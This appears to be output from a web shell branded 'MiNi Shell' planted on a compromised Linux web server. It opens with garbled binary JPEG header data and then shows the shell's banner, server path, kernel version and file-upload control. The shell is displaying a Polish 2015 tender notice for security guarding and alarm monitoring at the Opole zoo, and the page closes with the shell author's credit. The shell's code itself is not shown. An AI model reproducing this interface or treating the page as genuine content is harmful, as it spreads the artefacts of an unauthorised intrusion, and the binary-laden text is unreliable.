JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151106/300268-N-2015.html

<p class="kh_header"><b>Opole: Całodobowa ochrona i monitorowanie zwierząt, osób, obiektów ,oraz monitorowanie lokalnego systemu alarmowego znajdującego się na terenie Ogrodu Zoologicznego w Opolu przy ul. Spacerowej 10</b><br>
<b>Numer ogłoszenia: 300268 - 2015; data zamieszczenia: 06.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ogród Zoologiczny , ul. Spacerowa 10, 45-094 Opole, woj. opolskie, tel. 077 4542858, 4564267, faks 077 4564264.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zoo@zoo.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowa ochrona i monitorowanie zwierząt, osób, obiektów ,oraz monitorowanie lokalnego systemu alarmowego znajdującego się na terenie Ogrodu Zoologicznego w Opolu przy ul. Spacerowej 10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)	całodobowa ochrona całego terenu i obiektów przed włamaniem i  dewastacją, a także przed  kradzieżą mienia i zwierząt oraz ich okaleczeniem,  wrzucaniem jakichkolwiek przedmiotów na wybiegi zwierząt,
b)	wykonywanie usług monitorowania wizyjnego obiektów i terenu zgodnie z instrukcją obsługi systemu monitorującego,
c)	wyposażenie  każdego  pracownika ochrony w  urządzenia do kontroli  pracy  strażników  w systemie on-line oraz zainstalowanie na terenie Ogrodu w miejscach wskazanych przez Zamawiającego, 24 punktów kontrolnych, 
d)	system powinien przesyłać w czasie  rzeczywistym  do  centrum   dozoru  zlokalizowanym poza   obiektem   chronionym   informacje  o potwierdzeniu   przybycia   strażnika   na   punkt   kontrolny.  Jednocześnie  powinna  być zapewniona przez centrum  dozoru możliwość automatycznej   kontroli przybycia strażnika w określonym  czasie wskazanym  wcześniej  przez Zamawiającego, a w  przypadku  braku jego obecności w okresie +/- 10 minut   powinna być zrealizowana procedura sprawdzenia przez centrum dozoru przyczyny braku obecności   strażnika  na  punkcie  kontrolnym. Ponadto  system   powinien umożliwiać Zamawiającemu wgląd on-line (w czasie rzeczywistym) do historii poprzez sieć internetową, potwierdzeń  przybycia  strażników  na punkt kontrolny,
e)	opłata za obsługę centrum dozoru leży po stronie Wykonawcy i powinna być wliczona w  cenę  oferty,
f)	wykonywanie czynności  portierskich,
g)	piesze patrole wyznaczoną  przez  Zamawiającego trasą,  potwierdzone przez elektroniczny system pracy strażnika,
h)	skuteczna i adekwatna do zagrożenia interwencja z ewentualnym  wykorzystaniem własnej grupy interwencyjnej w uzasadnionych  przypadkach -  czas przyjazdu do 15 min.(o ile nie wystąpią  przeszkody  wydłużające,  np. blokada drogi  w związku z wypadkiem, pożarem, itp.)  lub   za  pomocą   wezwanych,   stosownych  organów,
i)	szybkie   i    skuteczne    reagowanie     w    przypadku    jakichkolwiek   awarii,   zagrożeń,  ze  szczególnym  uwzględnieniem   bezpieczeństwa  zwierząt,
j)	ewidencjonowanie w  książce  dyżurów  wszystkich  zdarzeń  zaistniałych  podczas  służby,
k)	nadzór  nad  sprawnym  wchodzeniem  i   wychodzeniem    zwiedzających
l)	zamykanie o wyznaczonej wg  potrzeb  godzinie  następujących   budynków: 
	małpiarni,
	żyrafiarni,
	budynku stawonogów,
	budynku DHD,
	odchowalni płazów,
	budynku socjalnego
	i innych wskazanych przez Zamawiającego, 
n)         nadzór nad sprawnym wejście i wyjściem zwiedzających     
           m)         monitorowanie lokalnego systemu alarmowego polegać ma na przyjmowaniu i rejestracji przez urządzenia odbiorcze Wykonawcy ,oraz analizę sygnałów przekazywanych przez lokalny system alarmowy Zamawiającego telefoniczną linią komutowaną .W zależności od typu otrzymanej informacji zostanie ona przekazana do stosownej służby, grupy interwencyjnej lub osoby  wyznaczonej przez Zamawiającego.
o)   zgłaszanie nieprawidłowości działania bądź usterek systemów alarmowych
p)   podłączenie lokalnego systemu alarmowego nastąpi na koszt Wykonawcy
r)   w celu zapewnienia sprawności technicznej systemu alarmowego Wykonawca zapewni     konserwację systemu co 6 miesięcy 
 Zamawiający wymaga , aby Wykonawca dysponował:                                                   
- trzech wpisanych na listę kwalifikowanych pracowników ochrony fizycznej  mających  doświadczenie,  przeszkolonymi, wyposażonymi w środki przymusu bezpośredniego  oraz  środki  łączności  zapewniające   kontakt  z  grupą  interwencyjną,
 -  pracowników kwalifikowanych  grupy interwencyjnej o doświadczeniu zawodowym  w przeprowadzaniu  interwencji ochrony fizycznej .
 -   grupą patrolowo-interwencyjną  przeznaczoną do realizacji niniejszego zadania.  
 -  środkami  przymusu  bezpośredniego (tj. kajdanki, pałki obronne wielofunkcyjne), w które będą wyposażeni pracownicy ochrony przy realizacji  przedmiotowego zamówienia.
- trzema niekwalifikowanymi pracownikami ochrony fizycznej.
	Wykonawca zapewni jednolite umundurowanie z emblematami agencji dla pracowników realizujących  zamówienie.
	Wykonawca    jest   zobowiązany  do   zapoznania   się   i   stosowania    regulaminu   dla       Zwiedzających,  obowiązującego w Ogrodzie Zoologicznym oraz  przepisów  porządkowych   i   BHP   dla    firm,  pracujących   na   terenie   Ogrodu    Zoologicznego.
	Szczegółowy zakres  czynności  i  wymagań  Zamawiającego, będzie zawarty w instrukcji przygotowanej przez Zamawiającego w uzgodnieniu z Wykonawcą po podpisaniu umowy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1.  posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, tj. aktualnej koncesji  na podjęcie działalności gospodarczej w zakresie objętym przedmiotowym zamówieniem dot. ochrony osób i mienia, obejmującej okres realizacji umowy wydanej przez właściwy organ administracji;
2.  posiadania  wiedzy  i  doświadczenia,  tj. wykonali lub wykonują w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy usługi polegające na ochronie osób i mienia oraz monitoringu na obiektach użyteczności publicznej;  
3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania  zamówienia tj. 
	kierownikiem ochrony - tj. jednego wpisanego na listę pracownika  kwalifikowanego ochrony fizycznej , który będzie nadzorowała świadczenie usługi,  z co najmniej 5-letnim doświadczeniem w zakresie kierowani zespołem pracowników ochrony. 
	Grupy interwencyjnej do całodobowej ,wyposażonego w oznakowany samochód oraz system łączności.
	Dwóch wpisanych na listę  kwalifikowanych pracowników ochrony fizycznej ,mających doświadczenie (staż pracy w tym zakresie min.3 lata)
	Trzech niekwalifikowanych pracowników ochrony.                                                                    
4. sytuacji ekonomicznej i finansowej, tj. posiadania aktualnej polisy ubezpieczeniowej od odpowiedzialności cywilnej (kontraktowej i deliktowej) lub innego dokumentu potwierdzającego ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 1.000.000 zł. 

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( art. 26 ust.2b Prawa).       

Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia do wykonania zamówienia Zamawiający żąda złożenia oświadczenia w formie wykazu usług wykonanych lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem do wykazu dokumentów potwierdzających ich należyte wykonanie.

    Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się wykonaniem/ wykonywaniem co najmniej trzech usług polegających na ochronie osób i mienia oraz monitoringu na obiektach użyteczności publicznej.  
    
     W przypadku wykazania doświadczenia, które udostępni inny podmiot, Wykonawca do wykazu załącza pisemne zobowiązanie do udostępnienia tego doświadczenia wystawione przez podmiot udostępniający. Zobowiązanie winno być złożone w oryginale.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda złożenia oświadczenia w formie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami. 
Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże:
	kierownika ochrony - tj. jednego wpisanego na listę pracowników  kwalifikowanych  ochrony fizycznej która będzie nadzorowała świadczenie usługi,  z co najmniej 5-letnim doświadczeniem w zakresie kierowania zespołem pracowników ochrony fizycznej i grup  interwencyjnych, do całodobowej dyspozycji, wyposażonego w oznakowany samochód oraz system łączności,
	dwóch wpisanych na listę  kwalifikowanych  pracowników ochrony fizycznej  mających  doświadczenie ( staż pracy w tym zakresie min. 3 lata ). 

     Wykonawca składający ofertę zobowiązuje się w przypadku podpisania umowy, do skierowania do pracy osoby wskazanej w wykazie. W przypadkach losowych wykluczających zatrudnienie osoby wskazanej w wykazie, Wykonawca będzie zobowiązany do zatrudnienia osoby o tych samych kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, a także wykonywanych przez nią czynności. 

      W przypadku wykazania w wykazie osoby lub osób, które udostępni inny podmiot, Wykonawca do wykazu załącza pisemne zobowiązanie do udostępnienia danej osoby, wystawione przez podmiot udostępniający. Zobowiązanie winno być złożone w oryginale.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający żąda złożenia aktualnej polisy ubezpieczeniowej od odpowiedzialności cywilnej lub innego dokumentu potwierdzającego ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 1.000.000 zł. 
               
      W przypadku wspólnego ubiegania się o udzielenie zamówienia dwóch lub więcej Wykonawców oceniona będzie ich łączna wiedza i doświadczenie, łączne dysponowanie pracownikami zdolnymi do wykonania zamówienia oraz łączna zdolność ekonomiczna i finansowa.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wwwzoo.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ogród Zoologiczny 45-094 Opole ul. Spacerowa10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2015 godzina 10:00, miejsce: Ogród Zoologiczny w Opolu, ul. Spacerowa 10 w Sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com